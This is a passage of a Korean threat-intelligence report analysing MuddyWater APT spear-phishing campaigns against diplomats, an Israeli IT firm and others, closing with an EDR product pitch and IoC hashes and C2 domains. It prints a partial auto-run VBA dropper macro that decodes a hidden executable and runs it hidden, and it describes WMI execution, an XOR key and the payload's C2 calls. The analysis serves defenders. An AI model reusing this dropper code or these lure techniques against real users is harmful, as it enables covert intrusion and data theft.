본 메일은 단일 기관이 아닌 유럽·중동·아프리카·아시아·미주 지역의 외교부, 주재 대사관, UN 산하 국제기구 계정 등 수백 명을 동시에 포함해 발송된 대량 스피어피싱 메일로 확인됩니다. 메일 제목은 'official invitation'으로, 외교 공관 간 공문 교류에서 흔히 사용되는 표현을 활용해 수신자의 경계심을 낮추는 방식으로 구성되었습니다.
제목에 구체적인 행사 정보를 포함하지 않고 본문 및 첨부파일 확인을 유도하는 구성은 스피어피싱 공격에서 반복적으로 관찰되는 패턴과 유사합니다.
발신자 주소는 오만 외교부 공식 도메인을 사용하고, 프랑스 파리 소재 오만 대사관 계정을 연상시키는 명명 규칙을 적용해 실존 외교 기관 계정으로 인식되도록 설계되었습니다.
이는 도메인 인지도를 활용해 메일의 신뢰성을 높이고, 외교 공관 간 공식 소통으로 오인하도록 유도하기 위한 사회공학적 기법입니다.
메일 본문은 오만 외교부 주최 국제 세미나 초청 형식으로 작성되었으며, 'Iran–Israel War'와 같은 시의성 높은 국제 정세 이슈를 주제로 제시해 외교 및 국제기구 종사자의 업무 관심사와 직접적으로 연결되도록 구성되어 있습니다.
첨부파일은 'Online Seminar.FM.gov.om.doc'이라는 Word 문서 형식으로 전달되었으며, 외교 공문에서 빈번히 사용되는 파일 유형을 활용해 매크로 실행 또는 문서 취약점 악용을 통한 초기 침투를 시도했을 가능성이 높은 형태입니다.
해당 문서가 실행되면, 사용자에게 정상적인 외교 관련 문서로 위장된 미끼 화면이 먼저 표시됩니다.
문서 상단에는 오만 국기 이미지와 함께 Foreign Ministry of Oman 문구가 포함된 배너 이미지가 배치되어 있으며, 이는 실제 오만 외교부 공식 문서의 형식을 모방한 시각적 요소입니다.
이러한 구성은 문서의 신뢰도를 높여 사용자가 의심 없이 내용을 확인하도록 유도하는 역할을 수행합니다.
![[그림 3-15] 악성 doc 문서의 실행된 화면](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-15%5D%20%EC%95%85%EC%84%B1%20doc%20%EB%AC%B8%EC%84%9C%EC%9D%98%20%EC%8B%A4%ED%96%89%EB%90%9C%20%ED%99%94%EB%A9%B4.png?hsLang=ko)
[그림 3-15] 악성 doc 문서의 실행된 화면
문서 중앙에는 'Attention! Word needs Enable Content'라는 문구가 크게 표시됩니다.
해당 문구는 문서의 정상적인 열람을 위해 콘텐츠 사용, 즉 매크로 활성화가 필요하다는 인상을 주도록 설계된 사회공학적 메시지입니다.
그 아래에는 Online Seminar, 특정 날짜, 중동 지역 정세와 관련된 외교·안보 주제의 문구가 배치되어 있으나, 실제 내용은 흐리게 처리되어 사용자가 문서를 온전히 확인할 수 없도록 구성되어 있습니다.
이로 인해 사용자는 문서 내용을 확인하기 위해 매크로 실행이 필요하다고 인식하게 됩니다.
사용자가 상단의 콘텐츠 사용(Enable Content) 버튼을 클릭하면, 문서에 포함된 VBA 매크로가 즉시 실행됩니다.
해당 매크로는 Word 문서의 Document_Open() 이벤트에 연결되어 있어, 매크로가 활성화되는 시점에 자동으로 실행 흐름이 시작됩니다. 추가적인 사용자 입력이나 클릭 동작은 요구되지 않습니다.
참고로 아래 VBA 매크로는 주요 실행 로직에 영향이 없고, 실사용 안 하거나 의미 없는 변수를 제거한 일부 내용입니다.
|
' Decode: 3-digit ASCII numbers to characters Function dddd(str As String) As String Dim out As String
For counter = 1 To Len(str) Step 3 out = out & Chr(Val(Mid(str, counter, 3))) Next
dddd = out End Function
' Execute: run the file path via Shell Function RRRR(path As String) On Error GoTo erorr2
Dim command As String Dim windowStyle As Integer Dim errorCode As Variant
command = path windowStyle = vbHide
errorCode = Shell(command, windowStyle) If errorCode <> 0 Then End If
erorr2: ' n End Function
' Auto-run: on document open → decode → write file → execute Private Sub Document_Open() On Error GoTo AAAA
Dim pth As String Dim app As String Dim fileNumber
pth = "C:\\Users\\Public\\Documents\\ManagerProc.log"
app = dddd(UserForm1.TextBox1.Text)
fileNumber = FreeFile Open pth For Output As fileNumber Print #fileNumber, app Close fileNumber
RRRR (pth)
AAAA: ' n End Sub |
[표 3-1] VBA 매크로 일부 화면
매크로 실행 이후, 악성 문서는 내부에 은닉된 악성 페이로드를 복원하는 과정을 수행합니다.
이 문서는 실행 파일을 VBA 코드 내부에 직접 포함하지 않고, UserForm 객체(UserForm1)에 포함된 TextBox 컨트롤 내부에 숫자 문자열 형태로 인코딩된 데이터를 저장하는 방식을 사용합니다.
해당 숫자 문자열은 3자리 숫자 단위로 구성되어 있으며, 각 숫자는 0부터 255 사이의 값으로 ASCII 바이트 하나에 대응됩니다.
디코딩 과정은 dddd() 함수에서 수행됩니다. 해당 함수는 숫자 문자열을 처음부터 끝까지 3자리씩 분리하여 읽은 뒤, 각 3자리 숫자를 정수 값으로 변환하고 이를 ASCII 문자로 치환하여 문자열에 순차적으로 결합합니다.
이 과정을 통해 최종적으로 실행 파일의 바이너리 데이터를 문자열 형태로 복원합니다. 이 문자열 전체를 순차적으로 디코딩하면 Windows 실행 파일(PE)이 복원됩니다.
![[그림 3-16] 숫자 문자열 디코딩 화면](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-16%5D%20%EC%88%AB%EC%9E%90%20%EB%AC%B8%EC%9E%90%EC%97%B4%20%EB%94%94%EC%BD%94%EB%94%A9%20%ED%99%94%EB%A9%B4.png?hsLang=ko)
[그림 3-16] 숫자 문자열 디코딩 화면
'ManagerProc.log' 파일은 사용자 시스템에 대한 즉각적인 정보 탈취보다는, 초기 침투 이후 감염 환경의 특성을 식별하고 원격 C2 서버와의 통신을 통해 지속적인 접근 거점을 확보하는 데 목적을 둔 악성 파일로 분석됩니다.
해당 파일은 실행 시 사용자명, 컴퓨터 이름, 관리자 권한 여부 등 시스템 기본 정보를 수집한 후 이를 암호화하여 screenai[.]online C2 서버로 전송합니다.
이러한 일련의 동작은 후속 악성 행위 또는 추가 페이로드 투입을 위한 사전 정찰 단계에 해당하는 전형적인 국가 배후형 스파이웨어 로더의 행태와 일치합니다.
3-6. 이스라엘 소재 IT 서비스 등을 제공 기업을 겨냥한 공격 사례
2025년 마지막 사례는 11월 17일 월요일 오후 5시 13분, 일반적인 근무 종료 시점에 근접한 시간대에 수신된 것으로 확인되며, 업무 마무리로 인해 보안 인식과 주의력이 상대적으로 저하되기 쉬운 퇴근 전 시간대를 노려 수행된 스피어피싱 초기 접근 공격으로 판단됩니다.
공격자는 히브리어(Hebrew)로 작성된 제목과 본문, 그리고 이스라엘 국가 도메인(.co.il)을 사용하는 발신 주소를 활용하여 이스라엘 소재 IT 서비스/보안/원격지원 등을 제공 또는 해당 기업 사용자를 주요 표적으로 설정한 정황이 확인됩니다.
메일 제목은 '회사 신규 지침 및 규정'이라는 표현을 사용하여 조직 내부 정책과 규정 관련 안내로 위장되어 있으며, 수신자가 즉시 확인해야 하는 공식 문서로 인식하도록 권위성과 업무적 중요성을 강조하는 사회공학적 요소가 포함되어 있습니다.
본문은 최소한의 안내 문구만 포함한 간결한 구조로 구성되어 있고, 외부 링크 없이 첨부파일 열람만을 요구함으로써 사용자의 의사결정 과정을 단축시키고 악성 문서 실행으로 자연스럽게 유도하는 방식이 적용되어 있습니다.
![[그림 3-17] 이스라엘 IT 서비스 제공 기업을 노린 공격 화면](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-17%5D%20%EC%9D%B4%EC%8A%A4%EB%9D%BC%EC%97%98%20IT%20%EC%84%9C%EB%B9%84%EC%8A%A4%20%EC%A0%9C%EA%B3%B5%20%EA%B8%B0%EC%97%85%EC%9D%84%20%EB%85%B8%EB%A6%B0%20%EA%B3%B5%EA%B2%A9%20%ED%99%94%EB%A9%B4.png?hsLang=ko)
[그림 3-17] 이스라엘 IT 서비스 제공 기업을 노린 공격 화면
위협 행위자는 동일한 악성 DOC 문서를 직접 첨부 방식과 ZIP 압축 방식으로 이중 제공하여, 보안 제품 탐지를 우회하거나 수신자의 파일 실행 가능성을 높이려는 시도를 한 것으로 해석됩니다.
![[그림 3-18] Webinar.doc 실행 화면](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-18%5D%20Webinar.doc%20%EC%8B%A4%ED%96%89%20%ED%99%94%EB%A9%B4.png?hsLang=ko)
[그림 3-18] Webinar.doc 실행 화면
'Webinar.doc' 문서는 VBA 프로젝트 내 ThisDocument 모듈의 Sub love_me_()를 중심으로 동작하며, 이 루틴이 매크로 실행 체인의 시작점 역할을 수행합니다.
먼저 Environ("USERPROFILE")를 이용해 사용자 프로필 경로를 확보한 뒤, 드롭 대상 파일 경로를 %USERPROFILE%\Downloads\PhotoAcq.log로 조합합니다.
이후 루틴은 페이로드를 직접 다운로드하지 않고, 문서 내부에 숨겨둔 데이터를 복원하는 방식으로 진행됩니다.
페이로드 데이터는 UserForm1에 포함된 컨트롤 데이터에 ASCII HEX 문자열 형태로 삽입되어 있으며, 이 문자열은 PE 바이너리(HEX 인코딩)입니다. VBA는 실행 시점에 해당 HEX 문자열을 읽어오고, 바이너리 변환 루틴을 호출합니다.
해당 변환 루틴은 입력된 HEX 문자열의 길이가 짝수인지 확인한 뒤, 2자리 HEX를 1바이트로 변환하여 바이너리를 'PhotoAcq.log' 파일로 생성합니다.
파일 생성 후에는 즉시 실행 단계로 전환되며, WMI에 연결한 뒤 Win32_Process 객체를 이용해 'PhotoAcq.log'를 프로세스로 실행합니다.
생성된 PhotoAcq.log 파일에는 미국 보안업체 SentinelOne의 아이콘 리소스가 포함되어 있으며, 내부에는 phoenix.pdb 경로 정보가 존재합니다.
-
C:\Users\win10\Desktop\phonix\phoenix\x64\Release\phoenix.pdb
![[그림 3-19] PhotoAcq.log 파일 정보](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-19%5D%20PhotoAcq.log%20%ED%8C%8C%EC%9D%BC%20%EC%A0%95%EB%B3%B4.png?hsLang=ko)
[그림 3-19] PhotoAcq.log 파일 정보
'PhotoAcq.log' 악성코드는 실행 시 로더 로직을 통해 .rdata 섹션 영역에 은닉된 페이로드(PE)를 메모리로 로드합니다. .rdata 섹션에는 총 1,308,672바이트(0x13F800) 크기의 암호화된 데이터가 연속적으로 저장되어 있으며, 해당 데이터는 평문 형태가 아닌 XOR 방식으로 인코딩된 상태로 포함되어 있습니다.
악성코드는 이 데이터를 동적으로 할당된 메모리 영역으로 복사한 뒤, 후속 복호화 과정을 수행합니다.
복호화 과정에서는 입력된 버퍼 전체를 순차적으로 순회하면서 각 바이트에 대해 32바이트 길이의 고정 XOR 키를 반복 적용합니다. 이때 키 인덱스는 i % 0x20 연산을 통해 계산되며, 이를 통해 XOR 연산이 적용되는 키 영역은 항상 32바이트 범위로 제한됩니다.
XOR 키는 평문 문자열 형태로 저장되어 있으며, 실제 복호화에 사용되는 키 값은 jfdghkjfdgklhjdfhgsfd09g9045jlkd 입니다.
복호화가 완료된 이후에는 복원된 Rust 언어 기반의 페이로드가 메모리 상에서 실행되며, Rust는 메모리 안전성을 강조하면서도 네이티브 코드로 컴파일되는 시스템 프로그래밍 언어입니다. 이후 후속 처리 과정을 통해 최종 악성 행위가 수행됩니다.
![[그림 3-20] PhotoAcq.log 파일에 숨겨진 Payload 분석 모습](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-20%5D%20PhotoAcq.log%20%ED%8C%8C%EC%9D%BC%EC%97%90%20%EC%88%A8%EA%B2%A8%EC%A7%84%20Payload%20%EB%B6%84%EC%84%9D%20%EB%AA%A8%EC%8A%B5.png?hsLang=ko)
[그림 3-20] PhotoAcq.log 파일에 숨겨진 Payload 분석 모습
페이로드는 Cylance, SentinelOne, VMware Carbon Black, CrowdStrike Falcon 등을 포함한 총 28개의 보안 프로그램 설치 조건을 확인합니다.
![[그림 3-21] 보안 제품 리스트 화면](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-21%5D%20%EB%B3%B4%EC%95%88%20%EC%A0%9C%ED%92%88%20%EB%A6%AC%EC%8A%A4%ED%8A%B8%20%ED%99%94%EB%A9%B4.png?hsLang=ko)
[그림 3-21] 보안 제품 리스트 화면
이 악성 프로그램이 열거한 Anti-Malware 업체 목록은 다음과 같습니다.
|
Microsoft Defender, Avast, AVG, Avira, Bitdefender, Kaspersky, ESET, McAfee, Norton, Trend Micro, Sophos, Malwarebytes, Panda Security, F-Secure, Comodo, Webroot, Cylance, SentinelOne, VMware Carbon Black, CrowdStrike, G DATA, Qihoo 360, K7 Computing, Quick Heal, Doctor Web, Check Point, BullGuard, Emsisoft |
[표 3-2] Anti-Malware 프로그램 리스트
악성파일은 실행 시 whoami.exe로 사용자 계정을 확인하고, hostname.exe로 시스템 식별 정보를 수집한 뒤, nslookup.exe를 통해 네트워크 상태 및 통신 가능 여부를 점검하는 순서로 동작합니다.
그리고 SSPI(Security Support Provider Interface) 기반 TLS 보안 컨텍스트를 생성하며, InitializeSecurityContextW 호출 과정에서 C2 서버 도메인을 전달합니다.
-
stratioai[.]org (159.198.68[.]25) [US]
이후 TLS 핸드셰이크를 통해 암호화된 HTTPS 세션을 수립하고 C2 통신을 수행하며, 이 과정에서 시스템 정보 또는 사용자 관련 데이터가 외부로 전송되어 개인정보 유출 및 추가적인 위협에 노출될 수 있습니다.
해당 도메인은 네트워크 상에서는 암호화되지만, TLS 초기화 단계에서는 메모리에 평문으로 존재하게 됩니다.
![[그림 3-22] C2 도메인 분석 화면](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-22%5D%20C2%20%EB%8F%84%EB%A9%94%EC%9D%B8%20%EB%B6%84%EC%84%9D%20%ED%99%94%EB%A9%B4.png?hsLang=ko)
[그림 3-22] C2 도메인 분석 화면
4. 2026년 최신 공격 사례 분석
4-1. 사이버 보안 지침 위장 공격 사례
2026년 01월 05일에 수행된 스피어피싱 공격은 투르크메니스탄(Turkmenistan)에 소재한 국영 이동통신 사업자가 사용하는 도메인 발신자 주소를 통해 유포되었습니다.
![[그림 4-1] 사이버 보안 지침으로 위장한 공격 화면](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%204-1%5D%20%EC%82%AC%EC%9D%B4%EB%B2%84%20%EB%B3%B4%EC%95%88%20%EC%A7%80%EC%B9%A8%EC%9C%BC%EB%A1%9C%20%EC%9C%84%EC%9E%A5%ED%95%9C%20%EA%B3%B5%EA%B2%A9%20%ED%99%94%EB%A9%B4.png?hsLang=ko)
[그림 4-1] 사이버 보안 지침으로 위장한 공격 화면
위협행위자는 중앙아시아 지역의 국가 기반 통신 사업자라는 점을 악용하여 발신자의 신뢰도를 인위적으로 높이고, 수신자가 공공 또는 통신 인프라 관련 기관에서 발송한 정상적인 안내 메일로 오인하도록 유도하였습니다.
메일 제목은 'New Cybersecurity Guidelines'로 설정되어 있으며, 이는 최근 보안 정책 변경이나 신규 가이드라인 배포로 인식되도록 하여 수신자의 업무 연관성과 긴급성을 자극하는 사회공학 기법이 적용된 사례로 분석됩니다.
본문 내용 또한 '자세한 내용은 첨부 문서를 참고하라'는 간결한 문구로 구성되어 있어, 수신자가 발신자 정보 및 첨부파일의 정당성을 충분히 검증하지 않은 상태에서 문서를 실행하도록 유도하는 구조를 가집니다.
첨부파일로 포함된 MS Word 문서 'Cybersecurity.doc'는 정상적인 보안 관련 문서로 위장된 악성 파일이며, 매크로 실행을 유도하는 미끼화면을 보여줍니다.
![[그림 4-2] Cybersecurity.doc 실행 화면](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%204-2%5D%20Cybersecurity.doc%20%EC%8B%A4%ED%96%89%20%ED%99%94%EB%A9%B4.png?hsLang=ko)
[그림 4-2] Cybersecurity.doc 실행 화면
해당 MS Word 문서에 포함된 VBA 매크로는 문서가 열리는 시점에 자동으로 실행되도록 구성되어 있으며, 악성 페이로드를 생성하고 이를 실행하는 드로퍼(dropper) 기능을 수행합니다. 매크로는 Document_Open 이벤트를 통해 동작하며, 문서 열람과 동시에 별도의 사용자 행위 없이 악성 로직이 실행됩니다.
우선, 매크로는 사용자에게 노출되지 않는 UserForm 내 텍스트 박스에 저장된 16진수(Hex) 형태의 데이터를 읽어 들여 이를 바이너리 데이터로 변환한 뒤, 해당 데이터를 'C:\ProgramData\CertificationKit.ini' 경로에 파일로 생성합니다.
이 과정에서 실제 악성 페이로드는 VBA 코드 본문이 아닌 폼 객체 내부에 은닉되어 있어, 정적 분석 시 악성 행위를 식별하기 어렵도록 구성되어 있습니다. 이후 매크로는 문자열 난독화 기법을 이용해 생성한 WScript.Shell COM 객체를 통해 외부 명령 실행 환경을 생성합니다.
실행 명령 또한 숫자 배열과 문자 변환 함수를 조합하는 방식으로 구성되어 있으며, 최종적으로 'cmd.exe /c CertificationKit.ini' 명령을 호출하여 파일을 실행합니다. 해당 명령은 콘솔 창이 표시되지 않도록 설정되어 있어, 사용자가 실행 사실을 인지하기 어렵습니다.
이번 'Cybersecurity.doc' 문서는 앞서 기술한 이스라엘 소재 IT 서비스 제공 기업을 대상으로 한 공격 사례에서 확인된 'Webinar.doc' 악성 문서와 매우 유사한 구조와 동작 방식을 가지고 있습니다.
생성된 'CertificationKit.ini' 파일은 64비트 EXE 실행 파일이며, Cloudflare 아이콘을 사용하고 있습니다. 또한 원본 파일명(Original filename)은 'reddit.exe'로 설정되어 있고, 기존과 동일하게 Rust 언어로 제작되어 있습니다.
-
nomercys.it[.]com (159.198.66[.]153) [US]
![[그림 4-3] Rust 기반 페이로드 C2 분석 화면](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%204-3%5D%20Rust%20%EA%B8%B0%EB%B0%98%20%ED%8E%98%EC%9D%B4%EB%A1%9C%EB%93%9C%20C2%20%EB%B6%84%EC%84%9D%20%ED%99%94%EB%A9%B4.png?hsLang=ko)
[그림 4-3] Rust 기반 페이로드 C2 분석 화면
C2 서버는 nomercys.it[.]com 도메인이 사용되며, 감염된 시스템으로부터 설치된 보안 제품 정보 등을 수집하고, 추가 명령 또는 페이로드를 전달하기 위한 통신 채널로 사용됩니다.
이러한 정황을 종합할 때, MuddyWater APT 그룹은 최근 DOC 파일 기반의 VBA 매크로를 초기 침투 벡터로 활용하고, Rust 기반 악성 페이로드를 통해 감염 시스템에 대한 정찰 및 정보수집 활동을 수행하는 전술을 지속적으로 운용하고 있습니다.
5. 결론 및 대응 (Conclusion)
5-1. 공격 양상 및 위협 평가
MuddyWater APT 그룹은 중동 전반을 주요 활동 무대로 삼아 다양한 산업군을 대상으로 장기간에 걸친 캠페인형 공격을 지속해 왔으며, 단기 침해가 아닌 장기 침투와 정보 수집을 핵심 목표로 하는 전략적 위협으로 평가됩니다.
이들의 공격은 표적과 시기가 변화하더라도 정상 업무 환경과 사용자 신뢰를 악용하는 전술적 일관성을 유지하고 있습니다.
5-2. 주요 공격 기법과 한계점
위협행위자는 합법적인 RMM 원격관리 도구를 악용하고 MS Word 문서 내 VBA 매크로를 초기 침투 수단으로 사용합니다.
최근에는 Rust 기반의 악성 실행 파일을 페이로드로 활용하는 공격 방식이 관찰됩니다.
5-3. EDR 중심 대응 전략의 필요성
따라서 MuddyWater APT의 위협에 대응하기 위해서는 이메일이나 문서 보안에 국한된 개별 방어를 넘어, 문서 실행 이후의 행위 흐름과 합법 도구의 비정상적 사용을 식별할 수 있는 EDR 기반 엔드포인트 행위 탐지를 보안 체계의 핵심 요소로 강화하는 전략이 필수적입니다.
지니언스 통합 엔드포인트 보안 플랫폼인 'Genian Insights E'는 엔드포인트 행위 기반 탐지(EDR)를 통해 이상 행위 활동을 즉각 식별하여 알려줍니다.
EDR은 VBA 매크로 실행 이후 엔드포인트에서 발생하는 비정상적인 실행 파일 생성 및 드롭 행위를 모니터링하고, 문서 프로세스(WINWORD.EXE)와 생성된 실행 파일(CertificationKit.ini) 간의 관계를 기반으로 이상 행위를 탐지합니다.
![[그림 5-1] 문서 프로세스의 이상 행위(XBA) 탐지 화면](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%205-1%5D%20%20%EB%AC%B8%EC%84%9C%20%ED%94%84%EB%A1%9C%EC%84%B8%EC%8A%A4%EC%9D%98%20%EC%9D%B4%EC%83%81%20%ED%96%89%EC%9C%84(XBA)%20%ED%83%90%EC%A7%80%20%ED%99%94%EB%A9%B4.png?hsLang=ko)
[그림 5-1] 문서 프로세스의 이상 행위(XBA) 탐지 화면
또한 감염 이후 단계에서 시도되는 외부 C2 서버와의 네트워크 연결 행위와 비정상적인 목적지, 주기적 통신 패턴 등을 엔드포인트 관점에서 제공합니다.
![[그림 5-2] 오피스 생성 파일의 네트워크 통신 화면](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%205-2%5D%20%EC%98%A4%ED%94%BC%EC%8A%A4%20%EC%83%9D%EC%84%B1%20%ED%8C%8C%EC%9D%BC%EC%9D%98%20%EB%84%A4%ED%8A%B8%EC%9B%8C%ED%81%AC%20%ED%86%B5%EC%8B%A0%20%ED%99%94%EB%A9%B4.png?hsLang=ko)
[그림 5-2] 오피스 생성 파일의 네트워크 통신 화면
더불어 시스템 정찰 단계에서 활용되는 cmd.exe 기반 명령 실행, 시스템 정보 수집 및 환경 열거 행위 등을 정상 사용자 활동과 구분하여 탐지함으로써 공격 전개 과정 전반을 상관 분석합니다.
![[그림 5-3] 시스템 정보 수집 시도 이상행위 탐지 화면](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%205-3%5D%20%EC%8B%9C%EC%8A%A4%ED%85%9C%20%EC%A0%95%EB%B3%B4%20%EC%88%98%EC%A7%91%20%EC%8B%9C%EB%8F%84%20%EC%9D%B4%EC%83%81%ED%96%89%EC%9C%84%20%ED%83%90%EC%A7%80%20%ED%99%94%EB%A9%B4.png?hsLang=ko)
[그림 5-3] 시스템 정보 수집 시도 이상행위 탐지 화면
엔드포인트 단에서의 행위 기반 가시성과 상관 분석 역량을 확보하지 않는 한, MuddyWater APT의 공격을 초기 단계에서 식별하는 것은 사실상 어렵습니다.
문서 실행 이후 발생하는 파일 생성, 프로세스 실행, 명령어 수행, 네트워크 통신과 같은 행위는 개별적으로는 정상 행위로 보일 수 있으나, 공격 전개 관점에서는 명확한 연관성을 가지며 단계적으로 반복됩니다.
이러한 특성으로 인해 EDR은 단일 이벤트가 아닌 엔드포인트 상의 행위 흐름과 프로세스 간 관계를 종합적으로 분석함으로써, 문서 기반 초기 침투부터 내부 정찰 및 외부 통신에 이르는 공격 전개 전반을 조기에 식별하고 침해 확산 이전에 대응할 수 있는 핵심 보안 요소로 작용합니다.
6. IoC (Indicator of Compromise)
-
MD5
806adc79e7ea3be50ef1d3974a16b7fb
0873ce3db84b79da935f71df3d6c8e6d
4055d8b5c2e909f5db8b75a5750a7005
68352f61da6e3236c4fe760997a981ea
75060f5394b72421c0d8f81f79931aa9
242098c3e87822bffa7c337987065fbe
809334c0b55009c5a50f37e4eec63c43
aaa9db79b5d6ba319e24e6180a7935d6
aba760ec55fdeccb35adb068443feb89
b9a67ffb81420e68f9e5607cc200604a
b181ecbb7394e3b1394a8c97af65b7e2
c5c0829df294cc4fd701df5d5c55718f
c381c2cb8fdd6acf1636280b9424f573
c478e472f6223e7ee92cff8b459e55e2
c89671f994af65677aa48b699a01fe9d
cdeb7abfc7775c63745135431272dda3
e2d6031afd81bf3b6a44de4d0b039055
ef6ec560efd05d21976a6fd3f489e206
f1c935ce028022ab2a495eae83adacc6
f06e30dee8629e951cefa73373fdef9d
f6a4c531e92cbdd5ffac75c76939d7f3
f97650ede0c39a29b0b5c5472f685d11
0a95918fd6000a69b8a70609f93e910f
1e9a4e774b61acc8a6b35ee50417e661
1f280f51eeb6cf895fe80082ce725841
2ed6ebaa28a9bfccc59c6e89a8990631
3a95186019af1943a0ea0f8eb07a288f
3ab16bd1c339fd0727be650104b74dd1
4c169dde3bc184c42ca7a712a61c6f3c
6d7ce5b03fe61683229c29a859505163
7da3d206519086f2725494b3ab095fbb
23d99f912f2491749b89e4fd337273bc
43be8a405a7f57cf9f910d829c521b21
64fc017a451ef273dcacdf6c099031f3
74e75830252220cbbe7e3adec4340d2d
93be13bbcad30440a0d0ef3868d67003
95d9e6c262632abe004c4693a71eaced
96d5a7e0e75654c444cb1a915c666ac8
244a4f81cff4a8dc5872628a40713735
-
C2
stratioai[.]org
159.198.68[.]25
nomercys.it[.]com
159.198.66[.]153
